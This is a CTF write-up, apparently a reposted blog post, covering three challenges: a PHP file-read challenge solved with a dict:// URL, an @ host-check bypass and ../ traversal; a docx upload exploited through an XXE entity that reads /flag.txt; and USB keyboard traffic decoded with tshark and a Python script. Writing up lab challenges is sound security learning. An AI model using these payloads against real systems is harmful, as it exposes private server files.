Lin Yi Bo portion WP

Today I played a CTF and learned a lot of things; I am writing them down so I remember.

web2

This question took me a long time and left a deep impression.
After starting, I found that the file parameter is a file name that has been base64-encoded twice. Reading index.php through it, the content comes back inside an <img> tag; after base64-decoding it, the source is as follows:

<?php
error_reporting(E_ALL || ~E_NOTICE);

header('content-type:text/html;charset=utf-8');
if(! isset($_GET['file']))
    header('Refresh:0;url=./index.php?file=WTNSbWFXMWhaMlV1YW5Cbg==');
$file = base64_decode(base64_decode($_GET['file']));   // file name is base64-decoded twice
echo '<title>'.$_GET['file'].'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);    // keeps only letters, digits and dots
echo 'input_filename:   '. $file.'</br>';
$file = str_replace("ctf","flag", $file);               // "ctf" in the name becomes "flag"
echo 'real_filename:   '.$file.'</br>';
$txt = base64_encode(file_get_contents($file));        // file content is returned as a base64 image
 
echo "<img src='data:image/gif;base64,".$txt."'></img>";
/*
 * Can you find the flag file?
 *
 * Hint: hal0flagi5here.php
 */
 ?>

Following the hint in the comment, I read the source of that file; it is as follows:

<?php
$argv[1]=$_GET['url'];
if(filter_var($argv[1],FILTER_VALIDATE_URL))   // only checks URL syntax, any scheme passes
{
	$r = parse_url($argv[1]);
	print_r($r);
	if(preg_match('/happyctf\.com$/',$r['host']))   // only checks that the host ends with happyctf.com
	{
		$url=file_get_contents($argv[1]);
		echo($url);
	}else
	{
		echo("error");
	}
}else
{
	echo "403 Forbidden";
}
?>

Here I got stuck. After a hint from a senior player I learned that the dict:// protocol exists. Then, bypassing the host check with @, I performed the file read test and obtained the flag.
payload: ?url=dict://@happyctf.com/../../../../../../../flag.txt

web4

I had not seen this kind of question before, so I am writing it down for the record; a similar question is discussed here: https://www.jianshu.com/p/40d6d0e7117f
This question hints at a .bak file; the downloaded source is as follows:

<?php
if(isset($_POST["submit"])) {
    $target_file = getcwd()."/upload/".md5($_FILES["file"]["tmp_name"]);
    if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
        try {
            $result = @file_get_contents("zip://".$target_file."#docProps/core.xml");   // reads core.xml out of the uploaded archive
            $xml = new SimpleXMLElement($result, LIBXML_NOENT);   // LIBXML_NOENT expands external entities
            $xml->registerXPathNamespace("dc", "http://purl.org/dc/elements/1.1/");
            foreach($xml->xpath('//dc:title') as $title){
                echo "Title '".$title . "' has been added.<br/>";
            }
        } catch (Exception $e){
            echo $e;
            echo "上传文件不是一个docx文档.";
        }
    } else {
        echo "上传失败.";
    }
}
?>

A doc file is actually a zip archive.
From the code you can see that it reads docProps/core.xml from the uploaded doc with the zip:// wrapper, and the <dc:title> element is read and echoed back directly. Download sample.doc, change its suffix to zip, and modify docProps/core.xml to:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE root[
  <!ENTITY xxe SYSTEM "/flag.txt">
  ]>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-01T19:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-08-01T19:01:00Z</dcterms:modified>
  <dc:title>&xxe;</dc:title>
  <cp:revision>1</cp:revision>
</cp:coreProperties>

After uploading it you get the flag.

Misc-Keyboard

USB keyboard traffic; refer to the following article:
https://www.cnblogs.com/hackxf/p/10670844.html
Open the archive and you find a u.pcapng file and an encrypted secret.zip file.
With the command tshark -r u.pcapng -T fields -e usb.capdata > usbdata.txt, export the capture data to usbdata.txt. (Normally every two hex digits in the output are separated by a colon; if they are not, you need to write a script yourself to add the colons.)
Then run Wang Hang's script on it to get a string of characters; type that string out in vim on Linux and you get the password of the encrypted file. Decrypting it gives the flag.
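The decoding step the post delegates to Wang Hang's script, as an added example (not the page's own code nor that script): it assumes usbdata.txt holds 8-byte boot-protocol keyboard reports exported with tshark -e usb.capdata, with or without colons, and a US key layout; the sample lines below are constructed, not taken from the challenge capture.

```python
import re

# HID usage ID -> (unshifted, shifted) for a US layout; extend as needed
KEYMAP = {0x04 + i: (chr(97 + i), chr(65 + i)) for i in range(26)}     # a-z
KEYMAP.update({0x1e + i: (c, s) for i, (c, s) in enumerate(zip("1234567890", "!@#$%^&*()"))})
KEYMAP.update({0x28: ('\n', '\n'), 0x2c: (' ', ' '), 0x2d: ('-', '_'), 0x2e: ('=', '+'),
               0x2f: ('[', '{'), 0x30: (']', '}'), 0x33: (';', ':'), 0x34: ("'", '"'),
               0x36: (',', '<'), 0x37: ('.', '>'), 0x38: ('/', '?')})
SHIFT_MASK = 0x22      # report byte 0: bit 1 = left shift, bit 5 = right shift
KEY_BACKSPACE = 0x2a

def parse_report(line):
    """8 report bytes for one usb.capdata line (colon-separated or not), else None."""
    hexstr = line.strip().replace(':', '')
    if not re.fullmatch(r'[0-9a-fA-F]{16}', hexstr):
        return None                      # blank line or non-keyboard record
    return bytes.fromhex(hexstr)

def decode_keystrokes(lines):
    """Rebuild typed text; a key counts once, when it first appears in a report."""
    text, prev_keys = [], set()
    for line in lines:
        report = parse_report(line)
        if report is None:
            continue
        modifiers = report[0]
        keys = [k for k in report[2:8] if k]   # bytes 2..7: up to 6 pressed keys
        for key in keys:
            if key in prev_keys:               # still held from the previous report
                continue
            if key == KEY_BACKSPACE:
                if text:
                    text.pop()
            elif key in KEYMAP:
                text.append(KEYMAP[key][1 if modifiers & SHIFT_MASK else 0])
        prev_keys = set(keys)
    return ''.join(text)

# Constructed sample export (not the challenge capture): shift+f, l, a, backspace,
# 4 (a line without colons), g held across two reports, shift+1, Enter.
SAMPLE = """02:00:09:00:00:00:00:00
00:00:0f:00:00:00:00:00
00:00:04:00:00:00:00:00
00:00:2a:00:00:00:00:00
0000210000000000
00:00:0a:00:00:00:00:00
00:00:0a:00:00:00:00:00
02:00:1e:00:00:00:00:00
00:00:28:00:00:00:00:00"""
```

Run decode_keystrokes on the lines of usbdata.txt; for the sample above it returns 'Fl4g!\n'.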

Origin blog.csdn.net/weixin_44377940/article/details/105152632